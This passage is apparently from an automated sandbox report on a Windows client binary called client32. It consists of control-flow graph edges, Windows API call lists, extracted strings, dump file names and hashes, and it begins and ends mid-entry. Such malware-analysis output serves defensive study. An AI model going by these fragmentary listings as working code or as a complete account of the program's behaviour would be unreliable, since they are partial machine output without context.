2006 1113a30d-1113a312 call 11132780 1996->2006 1997->1998 1998->1965 2000 1113a002-1113a008 1998->2000 2000->1965 2009 1113a00a-1113a00b SetForegroundWindow 2000->2009 2015 1113a325-1113a32b 2005->2015 2016 1113a429-1113a434 call 11139600 2005->2016 2006->2005 2009->1965 2011->1986 2012->2013 2023 1113a1b7-1113a1d2 2013->2023 2024 1113a228 2013->2024 2025 1113a331-1113a339 2015->2025 2026 1113a3db-1113a3e3 2015->2026 2034 1113a436-1113a448 call 110642e0 2016->2034 2035 1113a455-1113a45b 2016->2035 2019->1930 2020->2019 2029 1113a0c4-1113a0c5 SetForegroundWindow 2020->2029 2037 1113a1d5-1113a1e1 2023->2037 2024->1944 2025->2016 2032 1113a33f-1113a345 2025->2032 2026->2016 2030 1113a3e5-1113a423 call 1103f920 call 1103f960 call 1103f980 call 1103f940 call 11110000 2026->2030 2029->2019 2030->2016 2032->2016 2038 1113a34b-1113a362 call 111101b0 2032->2038 2034->2035 2056 1113a44a-1113a450 call 11142d90 2034->2056 2042 1113a461-1113a468 2035->2042 2043 1113a58a-1113a592 2035->2043 2044 1113a1e3-1113a1f7 call 11081d30 2037->2044 2045 1113a1fc-1113a209 call 11143e00 2037->2045 2053 1113a384 2038->2053 2054 1113a364-1113a382 call 11057eb0 2038->2054 2042->2043 2050 1113a46e-1113a487 call 1105e820 2042->2050 2043->1932 2044->2045 2059 1113a1f9 2044->2059 2045->2024 2061 1113a20b-1113a226 GetLastError call 11147060 2045->2061 2050->2043 2070 1113a48d-1113a4a0 2050->2070 2062 1113a386-1113a3d2 call 1110fff0 call 1104d790 call 1104ecd0 call 1104ed40 call 1104d7d0 2053->2062 2054->2062 2056->2035 2059->2045 2061->1950 2062->2016 2097 1113a3d4-1113a3d9 call 110ec320 2062->2097 2077 1113a4a2-1113a4a8 2070->2077 2078 1113a4cd-1113a4d3 2070->2078 2081 1113a4aa-1113a4c8 call 11147060 GetTickCount 2077->2081 2082 1113a4d9-1113a4e5 GetTickCount 2077->2082 2078->2043 2078->2082 2081->2043 2082->2043 2086 1113a4eb-1113a52b call 11143a50 call 11147af0 call 11143a50 call 110261a0 2082->2086 2104 1113a530-1113a535 2086->2104 2097->2016 2104->2104 2105 1113a537-1113a53d 2104->2105 2106 1113a540-1113a545 2105->2106 2106->2106 2107 1113a547-1113a571 call 1112d6e0 2106->2107 2110 1113a573-1113a574 FreeLibrary 2107->2110 2111 1113a57a-1113a587 call 11162777 2107->2111 2110->2111 2111->2043
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32(B24479DC), ref: 11139F07
                                                                                        • IsWindow.USER32(0001033C), ref: 11139F65
                                                                                        • IsWindowVisible.USER32(0001033C), ref: 11139F73
                                                                                        • IsWindowVisible.USER32(0001033C), ref: 11139FAB
                                                                                        • GetForegroundWindow.USER32 ref: 11139FC6
                                                                                        • EnableWindow.USER32(0001033C,00000000), ref: 11139FE0
                                                                                        • EnableWindow.USER32(0001033C,00000001), ref: 11139FFC
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                                        • FindWindowA.USER32 ref: 1113A049
                                                                                        • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                                        • IsWindowVisible.USER32(0001033C), ref: 1113A088
                                                                                        • IsIconic.USER32(0001033C), ref: 1113A095
                                                                                        • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                          • Part of subcall function 11132120: ShowWindow.USER32(0001033C,00000000), ref: 11132144
                                                                                          • Part of subcall function 11132120: ShowWindow.USER32(0001033C,11139EA2), ref: 11132156
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                                        • EnableWindow.USER32(0001033C,00000001), ref: 1113A0D4
                                                                                        • GetLastError.KERNEL32 ref: 1113A193
                                                                                        • GetLastError.KERNEL32 ref: 1113A20B
                                                                                        • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                                        • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                          • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110261A8
                                                                                        • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                        • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                        • API String ID: 2511061093-2542869446
                                                                                        • Opcode ID: 57c8f6d5fc209948f85bb8005e31a54a668fb70e88704be28680b1ba6f91acda
                                                                                        • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                                        • Opcode Fuzzy Hash: 57c8f6d5fc209948f85bb8005e31a54a668fb70e88704be28680b1ba6f91acda
                                                                                        • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2114 11134830-1113486c 2115 11134872-11134894 call 1105e820 2114->2115 2116 11134b94-11134baf call 11162bb7 2114->2116 2115->2116 2121 1113489a-111348ae GetLocalTime 2115->2121 2122 111348d1-11134953 LoadLibraryA call 11009940 call 110161e0 GetCurrentProcess 2121->2122 2123 111348b0-111348cc call 11147060 2121->2123 2130 11134955-1113496b GetProcAddress 2122->2130 2131 1113496d-11134974 GetProcessHandleCount 2122->2131 2123->2122 2130->2131 2132 11134976-11134978 SetLastError 2130->2132 2133 1113497e-11134986 2131->2133 2132->2133 2134 111349a2-111349ae 2133->2134 2135 11134988-111349a0 GetProcAddress 2133->2135 2138 111349b0-111349c8 GetProcAddress 2134->2138 2139 111349ca-111349d5 2134->2139 2135->2134 2136 111349d7-111349e2 SetLastError 2135->2136 2136->2138 2138->2139 2140 111349e4-111349ec SetLastError 2138->2140 2141 111349ef-111349ff GetProcAddress 2139->2141 2140->2141 2142 11134a01-11134a0d K32GetProcessMemoryInfo 2141->2142 2143 11134a0f-11134a11 SetLastError 2141->2143 2145 11134a17-11134a25 2142->2145 2143->2145 2146 11134a33-11134a3e 2145->2146 2147 11134a27-11134a2f 2145->2147 2148 11134a40-11134a48 2146->2148 2149 11134a4c-11134a57 2146->2149 2147->2146 2148->2149 2150 11134a65-11134a6f 2149->2150 2151 11134a59-11134a61 2149->2151 2152 11134a71-11134a78 2150->2152 2153 11134a7a-11134a7d 2150->2153 2151->2150 2154 11134a7f-11134a8d call 11147060 2152->2154 2153->2154 2155 11134a90-11134aa2 2153->2155 2154->2155 2159 11134b6a-11134b78 2155->2159 2160 11134aa8-11134aba call 110642e0 2155->2160 2162 11134b7a-11134b7b FreeLibrary 2159->2162 2163 11134b7d-11134b85 2159->2163 2160->2159 2167 11134ac0-11134ae1 call 1105e820 2160->2167 2162->2163 2165 11134b87-11134b88 FreeLibrary 2163->2165 2166 11134b8a-11134b8f 2163->2166 2165->2166 2166->2116 2168 11134b91-11134b92 FreeLibrary 2166->2168 2171 11134ae3-11134ae9 2167->2171 2172 11134aef-11134b0b call 1105e820 2167->2172 2168->2116 2171->2172 2173 11134aeb 2171->2173 2176 11134b16-11134b32 call 1105e820 2172->2176 2177 11134b0d-11134b10 2172->2177 2173->2172 2181 11134b34-11134b37 2176->2181 2182 11134b3d-11134b59 call 1105e820 2176->2182 2177->2176 2178 11134b12 2177->2178 2178->2176 2181->2182 2183 11134b39 2181->2183 2186 11134b60-11134b63 2182->2186 2187 11134b5b-11134b5e 2182->2187 2183->2182 2186->2159 2188 11134b65 call 11027de0 2186->2188 2187->2186 2187->2188 2188->2159
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,B24479DC), ref: 1113489E
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                                        • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                                        • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                                        • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                                        • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                                        • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                                        • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                                        • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                                        • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                                        • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                        • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                        • API String ID: 263027137-1001504656
                                                                                        • Opcode ID: 20c67bae0dcdf1604e8e4aa4e2af560c7cbaff05759c4426ccd2903a3aa2ec31
                                                                                        • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                                        • Opcode Fuzzy Hash: 20c67bae0dcdf1604e8e4aa4e2af560c7cbaff05759c4426ccd2903a3aa2ec31
                                                                                        • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                        • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000), ref: 111168EF
                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL), ref: 11116914
                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSettings,?,00000000,Client,silent,00000000,00000000), ref: 11116926
                                                                                        • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                                        • CoUninitialize.OLE32 ref: 111169E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                        • String ID: SHELL32.DLL$SHGetSettings
                                                                                        • API String ID: 4195908086-2348320231
                                                                                        • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                        • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                                        • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                        • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                                        APIs
                                                                                          • Part of subcall function 11145F00: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11145F70
                                                                                          • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                        • _memset.LIBCMT ref: 11146055
                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                        • API String ID: 4251163631-545709139
                                                                                        • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                        • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                        • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                        • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: NBCTL32.DLL$_License$serial_no
                                                                                        • API String ID: 2102423945-35127696
                                                                                        • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                        • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                                        • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                        • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 110317A4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID: Client32$NSMWClass$NSMWClass
                                                                                        • API String ID: 3192549508-611217420
                                                                                        • Opcode ID: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                                        • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                                        • Opcode Fuzzy Hash: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                                        • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                                        APIs
                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,004DD400,004DD400,004DD400,004DD400,004DD400,004DD400,004DD400,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                        • EqualSid.ADVAPI32(?,004DD400,?,00000001,00000001), ref: 1109EDC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InformationToken$AllocateEqualInitialize
                                                                                        • String ID:
                                                                                        • API String ID: 1878589025-0
                                                                                        • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                        • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                                        • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                        • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,B24479DC,00080000,00000000,?), ref: 1109D88D
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                        • String ID:
                                                                                        • API String ID: 2349140579-0
                                                                                        • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
